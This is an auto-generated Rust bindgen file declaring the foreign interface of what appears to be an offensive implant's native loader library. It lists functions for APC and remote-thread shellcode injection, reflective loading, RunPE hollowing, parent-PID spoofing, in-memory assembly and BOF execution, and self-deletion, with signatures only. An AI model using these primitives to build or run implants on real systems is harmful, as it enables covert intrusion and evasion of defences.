/* automatically generated by rust-bindgen 0.72.1 */

pub const __bool_true_false_are_defined: u32 = 1;
pub const false_: u32 = 0;
pub const true_: u32 = 1;
pub const _VCRT_COMPILER_PREPROCESSOR: u32 = 1;
pub const _SAL_VERSION: u32 = 20;
pub const __SAL_H_VERSION: u32 = 180000000;
pub const _USE_DECLSPECS_FOR_SAL: u32 = 0;
pub const _USE_ATTRIBUTES_FOR_SAL: u32 = 0;
pub const _CRT_PACKING: u32 = 8;
pub const _HAS_EXCEPTIONS: u32 = 1;
pub const _STL_LANG: u32 = 0;
pub const _HAS_CXX17: u32 = 0;
pub const _HAS_CXX20: u32 = 0;
pub const _HAS_CXX23: u32 = 0;
pub const _HAS_CXX26: u32 = 0;
pub const _HAS_NODISCARD: u32 = 0;
pub const WCHAR_MIN: u32 = 0;
pub const WCHAR_MAX: u32 = 65535;
pub const WINT_MIN: u32 = 0;
pub const WINT_MAX: u32 = 65535;
pub type va_list = *mut ::std::os::raw::c_char;
extern "C" {
    pub fn __va_start(arg1: *mut *mut ::std::os::raw::c_char, ...);
}
pub type __vcrt_bool = bool;
pub type wchar_t = ::std::os::raw::c_ushort;
extern "C" {
    pub fn __security_init_cookie();
}
extern "C" {
    pub fn __security_check_cookie(_StackCookie: usize);
}
extern "C" {
    pub fn __report_gsfailure(_StackCookie: usize) -> !;
}
extern "C" {
    pub static mut __security_cookie: usize;
}
pub type int_least8_t = ::std::os::raw::c_schar;
pub type int_least16_t = ::std::os::raw::c_short;
pub type int_least32_t = ::std::os::raw::c_int;
pub type int_least64_t = ::std::os::raw::c_longlong;
pub type uint_least8_t = ::std::os::raw::c_uchar;
pub type uint_least16_t = ::std::os::raw::c_ushort;
pub type uint_least32_t = ::std::os::raw::c_uint;
pub type uint_least64_t = ::std::os::raw::c_ulonglong;
pub type int_fast8_t = ::std::os::raw::c_schar;
pub type int_fast16_t = ::std::os::raw::c_int;
pub type int_fast32_t = ::std::os::raw::c_int;
pub type int_fast64_t = ::std::os::raw::c_longlong;
pub type uint_fast8_t = ::std::os::raw::c_uchar;
pub type uint_fast16_t = ::std::os::raw::c_uint;
pub type uint_fast32_t = ::std::os::raw::c_uint;
pub type uint_fast64_t = ::std::os::raw::c_ulonglong;
pub type intmax_t = ::std::os::raw::c_longlong;
pub type uintmax_t = ::std::os::raw::c_ulonglong;
#[repr(C)]
#[derive(Debug, Copy, Clone)]
pub struct RawString {
    pub data: *mut u8,
    pub len: usize,
    pub capacity: usize,
}
#[test]
fn bindgen_test_layout_RawString() {
    const UNINIT: ::std::mem::MaybeUninit<RawString> = ::std::mem::MaybeUninit::uninit();
    let ptr = UNINIT.as_ptr();
    assert_eq!(
        ::std::mem::size_of::<RawString>(),
        24usize,
        "Size of RawString"
    );
    assert_eq!(
        ::std::mem::align_of::<RawString>(),
        8usize,
        "Alignment of RawString"
    );
    assert_eq!(
        unsafe { ::std::ptr::addr_of!((*ptr).data) as usize - ptr as usize },
        0usize,
        "Offset of field: RawString::data"
    );
    assert_eq!(
        unsafe { ::std::ptr::addr_of!((*ptr).len) as usize - ptr as usize },
        8usize,
        "Offset of field: RawString::len"
    );
    assert_eq!(
        unsafe { ::std::ptr::addr_of!((*ptr).capacity) as usize - ptr as usize },
        16usize,
        "Offset of field: RawString::capacity"
    );
}
#[repr(C)]
#[derive(Debug, Copy, Clone)]
pub struct MaleficPipe {
    pub read: *const ::std::os::raw::c_void,
    pub write: *const ::std::os::raw::c_void,
}
#[test]
fn bindgen_test_layout_MaleficPipe() {
    const UNINIT: ::std::mem::MaybeUninit<MaleficPipe> = ::std::mem::MaybeUninit::uninit();
    let ptr = UNINIT.as_ptr();
    assert_eq!(
        ::std::mem::size_of::<MaleficPipe>(),
        16usize,
        "Size of MaleficPipe"
    );
    assert_eq!(
        ::std::mem::align_of::<MaleficPipe>(),
        8usize,
        "Alignment of MaleficPipe"
    );
    assert_eq!(
        unsafe { ::std::ptr::addr_of!((*ptr).read) as usize - ptr as usize },
        0usize,
        "Offset of field: MaleficPipe::read"
    );
    assert_eq!(
        unsafe { ::std::ptr::addr_of!((*ptr).write) as usize - ptr as usize },
        8usize,
        "Offset of field: MaleficPipe::write"
    );
}
#[repr(C)]
#[derive(Debug, Copy, Clone)]
pub struct DarkModule {
    pub module_base: *const ::std::os::raw::c_void,
}
#[test]
fn bindgen_test_layout_DarkModule() {
    const UNINIT: ::std::mem::MaybeUninit<DarkModule> = ::std::mem::MaybeUninit::uninit();
    let ptr = UNINIT.as_ptr();
    assert_eq!(
        ::std::mem::size_of::<DarkModule>(),
        8usize,
        "Size of DarkModule"
    );
    assert_eq!(
        ::std::mem::align_of::<DarkModule>(),
        8usize,
        "Alignment of DarkModule"
    );
    assert_eq!(
        unsafe { ::std::ptr::addr_of!((*ptr).module_base) as usize - ptr as usize },
        0usize,
        "Offset of field: DarkModule::module_base"
    );
}
extern "C" {
    pub fn ApcLoaderInline(
        bin: *const u8,
        bin_len: usize,
        need_output: bool,
        loader_type: u32,
    ) -> RawString;
}
extern "C" {
    pub fn ApcLoaderSacriface(
        bin: *const u8,
        bin_len: usize,
        sacrifice_commandline: *mut ::std::os::raw::c_char,
        ppid: u32,
        block_dll: bool,
        need_output: bool,
    ) -> RawString;
}
extern "C" {
    pub fn DeleteSelf(stream: *const u8, stream_len: u32);
}
extern "C" {
    pub fn InjectRemoteThread(bin: *const u8, bin_len: usize, pid: u32) -> RawString;
}
extern "C" {
    pub fn MaleficLoadLibrary(
        flags: u32,
        buffer: *const u16,
        file_buffer: *const ::std::os::raw::c_void,
        len: usize,
        name: *const u8,
    ) -> *const ::std::os::raw::c_void;
}
extern "C" {
    pub fn MaleficGetFuncAddrWithModuleBaseDefault(
        module_base: *const ::std::os::raw::c_void,
        func_name: *const u8,
        func_name_len: usize,
    ) -> *const ::std::os::raw::c_void;
}
extern "C" {
    pub fn ReflectiveLoader(
        start_commandline: *const u8,
        start_commandline_len: usize,
        reflective_loader_name: *const u8,
        reflective_loader_name_len: usize,
        data: *const u8,
        data_len: usize,
        param: *const u8,
        param_len: usize,
        ppid: u32,
        block_dll: bool,
        timeout: u32,
        is_need_output: bool,
    ) -> RawString;
}
extern "C" {
    pub fn InlinePE(
        bin: *const u8,
        bin_size: usize,
        magic: *const u16,
        signature: *const u32,
        commandline: *const u8,
        commandline_len: usize,
        entrypoint: *const u8,
        entrypoint_len: usize,
        is_dll: bool,
        is_need_output: bool,
        timeout: u32,
        delay: u32,
    ) -> RawString;
}
extern "C" {
    pub fn RunPE(
        start_commandline: *const u8,
        start_commandline_len: usize,
        hijack_commandline: *const u8,
        hijack_commandline_len: usize,
        data: *const u8,
        data_size: usize,
        entrypoint: *const u8,
        entrypoint_len: usize,
        args: *const u8,
        args_len: usize,
        is_x86: bool,
        pid: u32,
        block_dll: bool,
        need_output: bool,
    ) -> RawString;
}
extern "C" {
    pub fn RunSacrifice(
        application_name: *mut u8,
        start_commandline: *const u8,
        start_commandline_len: usize,
        hijack_commandline: *const u8,
        hijack_commandline_len: usize,
        parent_id: u32,
        need_output: bool,
        block_dll: bool,
    ) -> RawString;
}
extern "C" {
    pub fn MaleficExecAssembleInMemory(
        data: *const u8,
        data_len: usize,
        args: *const *const u8,
        args_len: usize,
    ) -> RawString;
}
extern "C" {
    pub fn MaleficBofLoader(
        buffer: *const u8,
        buffer_len: usize,
        arguments: *const *const u8,
        arguments_size: usize,
        entrypoint_name: *const u8,
    ) -> RawString;
}
extern "C" {
    pub fn HijackCommandLine(commandline: *const u8, commandline_len: usize) -> u8;
}
extern "C" {
    pub fn MaleficPwshExecCommand(command: *const u8, command_len: usize) -> RawString;
}
extern "C" {
    pub fn PELoader(
        handle: *const ::std::os::raw::c_void,
        base_addr: *const ::std::os::raw::c_void,
        size: usize,
        need_modify_magic: bool,
        need_modify_sign: bool,
        magic: u16,
        signature: u32,
    ) -> *const ::std::os::raw::c_void;
}
extern "C" {
    pub fn UnloadPE(module: *const ::std::os::raw::c_void);
}
extern "C" {
    pub fn MVirtualAlloc(
        ptr: *mut ::std::os::raw::c_void,
        size: usize,
        flags: u32,
        protect: u32,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MVirtualAllocEx(
        handle: *const ::std::os::raw::c_void,
        ptr: *mut ::std::os::raw::c_void,
        size: usize,
        flags: u32,
        protect: u32,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MVirtualProtect(
        ptr: *mut ::std::os::raw::c_void,
        size: usize,
        new_protect: u32,
        old_protect: *mut u32,
    ) -> bool;
}
extern "C" {
    pub fn MVirtualProtectEx(
        handle: *const ::std::os::raw::c_void,
        ptr: *mut ::std::os::raw::c_void,
        size: usize,
        new_protect: u32,
        old_protect: *mut u32,
    ) -> bool;
}
extern "C" {
    pub fn MWriteProcessMemory(
        handle: *const ::std::os::raw::c_void,
        ptr: *mut ::std::os::raw::c_void,
        data: *const ::std::os::raw::c_void,
        len: usize,
    ) -> bool;
}
extern "C" {
    pub fn MReadProcessMemory(
        handle: *const ::std::os::raw::c_void,
        ptr: *mut ::std::os::raw::c_void,
        data: *mut ::std::os::raw::c_void,
        len: usize,
    ) -> bool;
}
extern "C" {
    pub fn MNtAllocateVirtualMemory(
        handle: *const ::std::os::raw::c_void,
        ptr: *mut *mut ::std::os::raw::c_void,
        size: *mut usize,
        allocation_type: u32,
        protect: u32,
    ) -> i32;
}
extern "C" {
    pub fn MNtWriteVirtualMemory(
        handle: *const ::std::os::raw::c_void,
        ptr: *mut ::std::os::raw::c_void,
        data: *const ::std::os::raw::c_void,
        len: usize,
    ) -> i32;
}
extern "C" {
    pub fn MNtProtectVirtualMemory(
        handle: *const ::std::os::raw::c_void,
        ptr: *mut *mut ::std::os::raw::c_void,
        size: *mut usize,
        new_protect: u32,
        old_protect: *mut u32,
    ) -> i32;
}
extern "C" {
    pub fn MNtCreateSection(
        section_handle: *mut *mut ::std::os::raw::c_void,
        size: *mut usize,
        protect: u32,
        flags: u32,
    ) -> i32;
}
extern "C" {
    pub fn MNtMapViewOfSection(
        section_handle: *mut *mut ::std::os::raw::c_void,
        handle: *const ::std::os::raw::c_void,
        ptr: *mut *mut ::std::os::raw::c_void,
        size: *mut usize,
        flags: u32,
        protect: u32,
    ) -> i32;
}
extern "C" {
    pub fn MHeapAlloc(size: usize, flags: u32) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MRtlFillMemory(Destination: *mut ::std::os::raw::c_void, Length: usize, Fill: u8);
}
extern "C" {
    pub fn MOpenProcess(
        dwDesiredAccess: u32,
        bInheritHandle: i32,
        dwProcessId: u32,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MCreateProcessA(
        lpApplicationName: *const i8,
        lpCommandLine: *mut i8,
        lpProcessAttributes: *mut ::std::os::raw::c_void,
        lpThreadAttributes: *mut ::std::os::raw::c_void,
        bInheritHandles: i32,
        dwCreationFlags: u32,
        lpEnvironment: *mut ::std::os::raw::c_void,
        lpCurrentDirectory: *const i8,
        lpStartupInfo: *mut ::std::os::raw::c_void,
        lpProcessInformation: *mut ::std::os::raw::c_void,
    ) -> bool;
}
extern "C" {
    pub fn MGetCurrentProcessId() -> u32;
}
extern "C" {
    pub fn MGetCurrentThread() -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MTerminateProcess(hProcess: *mut ::std::os::raw::c_void, uExitCode: u32) -> bool;
}
extern "C" {
    pub fn MCreateRemoteThread(
        hProcess: *mut ::std::os::raw::c_void,
        lpThreadAttributes: *mut ::std::os::raw::c_void,
        dwStackSize: u32,
        lpStartAddress: *mut ::std::os::raw::c_void,
        lpParameter: *mut ::std::os::raw::c_void,
        dwCreationFlags: u32,
        lpThreadId: *mut u32,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MOpenThread(
        dwDesiredAccess: u32,
        bInheritHandle: i32,
        dwThreadId: u32,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MSuspendThread(hThread: *mut ::std::os::raw::c_void) -> u32;
}
extern "C" {
    pub fn MResumeThread(hThread: *mut ::std::os::raw::c_void) -> u32;
}
extern "C" {
    pub fn MExitThread(dwExitCode: u32);
}
extern "C" {
    pub fn MGetThreadContext(
        hThread: *mut ::std::os::raw::c_void,
        lpContext: *mut ::std::os::raw::c_void,
    ) -> bool;
}
extern "C" {
    pub fn MSetThreadContext(
        hThread: *mut ::std::os::raw::c_void,
        lpContext: *mut ::std::os::raw::c_void,
    ) -> bool;
}
extern "C" {
    pub fn MWaitForSingleObject(hHandle: *mut ::std::os::raw::c_void, dwMilliseconds: u32) -> u32;
}
extern "C" {
    pub fn MQueueUserApc(
        pfnAPC: *mut ::std::os::raw::c_void,
        hThread: *mut ::std::os::raw::c_void,
        dwData: u32,
    ) -> u32;
}
extern "C" {
    pub fn MNtQueueApcThreadEx(
        ThreadHandle: *mut ::std::os::raw::c_void,
        UserApcReserve: *mut ::std::os::raw::c_void,
        ApcRoutine: *mut ::std::os::raw::c_void,
        ApcArgument1: *mut ::std::os::raw::c_void,
        ApcArgument2: *mut ::std::os::raw::c_void,
        ApcArgument3: *mut ::std::os::raw::c_void,
    ) -> i32;
}
extern "C" {
    pub fn MNtTestAlert() -> i32;
}
extern "C" {
    pub fn MCreateToolhelp32Snapshot(
        dwFlags: u32,
        th32ProcessID: u32,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MThread32First(
        hSnapshot: *mut ::std::os::raw::c_void,
        lpte: *mut ::std::os::raw::c_void,
    ) -> bool;
}
extern "C" {
    pub fn MThread32Next(
        hSnapshot: *mut ::std::os::raw::c_void,
        lpte: *mut ::std::os::raw::c_void,
    ) -> bool;
}
extern "C" {
    pub fn MLoadLibraryA(lpLibFileName: *const u8) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MLoadLibraryW(lpLibFileName: *const u16) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MFreeLibrary(hLibModule: *mut ::std::os::raw::c_void) -> i32;
}
extern "C" {
    pub fn MGetModuleHandleA(lpmodulename: *const u8) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MCloseHandle(handle: *mut ::std::os::raw::c_void);
}
extern "C" {
    pub fn MNtClose(handle: *mut ::std::os::raw::c_void) -> i32;
}
extern "C" {
    pub fn MGetDC(hWnd: *mut ::std::os::raw::c_void) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MEnumFontsA(
        hdc: *mut ::std::os::raw::c_void,
        lpLogfont: *const u8,
        lpProc: *mut ::std::os::raw::c_void,
        lParam: isize,
    ) -> i32;
}
extern "C" {
    pub fn MEnumSystemLocalesA(lpLocaleEnumProc: *mut ::std::os::raw::c_void, dwFlags: u32) -> i32;
}
extern "C" {
    pub fn MEnumWindows(lpEnumFunc: *mut ::std::os::raw::c_void, lParam: isize) -> i32;
}
extern "C" {
    pub fn MGetProcAddress(
        module: *const ::std::os::raw::c_void,
        proc_name: *const u8,
    ) -> *const ::std::os::raw::c_void;
}
extern "C" {
    pub fn MCreateThread(
        thread_attributes: *mut ::std::os::raw::c_void,
        stack_size: u32,
        start_address: *mut ::std::os::raw::c_void,
        parameter: *mut ::std::os::raw::c_void,
        creation_flags: u32,
        thread_id: *mut u32,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MNtCreateThreadEx(
        thread_handle: *mut ::std::os::raw::c_void,
        desired_access: u32,
        object_attributes: *mut ::std::os::raw::c_void,
        process_handle: *mut ::std::os::raw::c_void,
        start_address: *mut ::std::os::raw::c_void,
        start_parameter: *mut ::std::os::raw::c_void,
        create_suspended: i32,
        stack_zero_bits: u32,
        size_of_stack_commit: u32,
        size_of_stack_reserve: u32,
        attribute_list: *mut ::std::os::raw::c_void,
    ) -> i32;
}
extern "C" {
    pub fn MGetCurrentProcess() -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MaleficMakePipe(
        read: *mut *mut ::std::os::raw::c_void,
        write: *mut *mut ::std::os::raw::c_void,
    ) -> bool;
}
extern "C" {
    pub fn MaleficPipeRedirectStdOut(
        write: *mut ::std::os::raw::c_void,
    ) -> *const ::std::os::raw::c_void;
}
extern "C" {
    pub fn MaleficPipeRepairedStdOut(stdout_handle: *const ::std::os::raw::c_void);
}
extern "C" {
    pub fn MaleficPipeRead(read_pipe: *mut ::std::os::raw::c_void) -> *const u8;
}
extern "C" {
    pub fn SafeFreePipeData(data: *const u8);
}
extern "C" {
    pub fn CLRVersion() -> RawString;
}
extern "C" {
    pub fn MProcess32First(
        hSnapshot: *mut ::std::os::raw::c_void,
        lppe: *mut ::std::os::raw::c_void,
    ) -> bool;
}
extern "C" {
    pub fn MProcess32Next(
        hSnapshot: *mut ::std::os::raw::c_void,
        lppe: *mut ::std::os::raw::c_void,
    ) -> bool;
}
extern "C" {
    pub fn MNtContinue(ThreadContext: *mut ::std::os::raw::c_void, RaiseAlert: u8) -> i32;
}
extern "C" {
    pub fn MGetNumaNodeProcessorMask(Node: u8, ProcessorMask: *mut u64) -> bool;
}
extern "C" {
    pub fn MNtFlushInstructionCache(
        ProcessHandle: *mut ::std::os::raw::c_void,
        BaseAddress: *mut ::std::os::raw::c_void,
        NumberOfBytesToFlush: usize,
    ) -> i32;
}
extern "C" {
    pub fn MNtQueryInformationThread(
        ThreadHandle: *mut ::std::os::raw::c_void,
        ThreadInformationClass: u32,
        ThreadInformation: *mut ::std::os::raw::c_void,
        ThreadInformationLength: u32,
        ReturnLength: *mut u32,
    ) -> i32;
}
extern "C" {
    pub fn MRtlCaptureContext(ContextRecord: *mut ::std::os::raw::c_void);
}
extern "C" {
    pub fn MAddVectoredExceptionHandler(
        First: u32,
        Handler: *mut ::std::os::raw::c_void,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MRemoveVectoredExceptionHandler(Handle: *mut ::std::os::raw::c_void) -> u32;
}
extern "C" {
    pub fn MVirtualAllocExNuma(
        hProcess: *mut ::std::os::raw::c_void,
        lpAddress: *mut ::std::os::raw::c_void,
        dwSize: usize,
        flAllocationType: u32,
        flProtect: u32,
        nndPreferred: u32,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MCreateEventA(
        lpEventAttributes: *mut ::std::os::raw::c_void,
        bManualReset: i32,
        bInitialState: i32,
        lpName: *const u8,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MSetEvent(hEvent: *mut ::std::os::raw::c_void) -> bool;
}
extern "C" {
    pub fn MSleepEx(dwMilliseconds: u32, bAlertable: i32) -> u32;
}
extern "C" {
    pub fn MCreateFileW(
        lpFileName: *mut u16,
        dwDesiredAccess: u32,
        dwShareMode: u32,
        lpSecurityAttributes: *mut ::std::os::raw::c_void,
        dwCreationDisposition: u32,
        dwFlagsAndAttributes: u32,
        hTemplateFile: *mut ::std::os::raw::c_void,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MWriteFile(
        hFile: *mut ::std::os::raw::c_void,
        lpBuffer: *mut u8,
        nNumberOfBytesToWrite: u32,
        lpNumberOfBytesWritten: *mut u32,
        lpOverlapped: *mut ::std::os::raw::c_void,
    ) -> bool;
}
extern "C" {
    pub fn MNtSetInformationFile(
        hFile: *mut ::std::os::raw::c_void,
        IoStatusBlock: *mut ::std::os::raw::c_void,
        FileInformation: *mut ::std::os::raw::c_void,
        Length: u32,
        FileInformationClass: u32,
    ) -> i32;
}
extern "C" {
    pub fn MNtQueryInformationProcess(
        ProcessHandle: *mut ::std::os::raw::c_void,
        ProcessInformationClass: u32,
        ProcessInformation: *mut ::std::os::raw::c_void,
        ProcessInformationLength: u32,
        ReturnLength: *mut u32,
    ) -> i32;
}
extern "C" {
    pub fn MCreateThreadpoolWork(
        pfnwk: *mut ::std::os::raw::c_void,
        pv: *mut ::std::os::raw::c_void,
        pcbe: *mut ::std::os::raw::c_void,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MCreateThreadpoolIo(
        fl: *mut ::std::os::raw::c_void,
        pfnio: *mut ::std::os::raw::c_void,
        pv: *mut ::std::os::raw::c_void,
        pcbe: *mut ::std::os::raw::c_void,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MCreateThreadpoolTimer(
        pfnti: *mut ::std::os::raw::c_void,
        pv: *mut ::std::os::raw::c_void,
        pcbe: *mut ::std::os::raw::c_void,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MCreateThreadpoolWait(
        pfnwa: *mut ::std::os::raw::c_void,
        pv: *mut ::std::os::raw::c_void,
        pcbe: *mut ::std::os::raw::c_void,
    ) -> *mut ::std::os::raw::c_void;
}
extern "C" {
    pub fn MTpAllocAlpcCompletion(
        AlpcReturn: *mut ::std::os::raw::c_void,
        AlpcPort: *mut ::std::os::raw::c_void,
        Callback: *mut ::std::os::raw::c_void,
        Context: *mut ::std::os::raw::c_void,
        CallbackEnviron: *mut ::std::os::raw::c_void,
    ) -> i32;
}
extern "C" {
    pub fn MTpAllocJobNotification(
        JobReturn: *mut ::std::os::raw::c_void,
        HJob: *mut ::std::os::raw::c_void,
        Callback: *mut ::std::os::raw::c_void,
        Context: *mut ::std::os::raw::c_void,
        CallbackEnviron: *mut ::std::os::raw::c_void,
    ) -> i32;
}
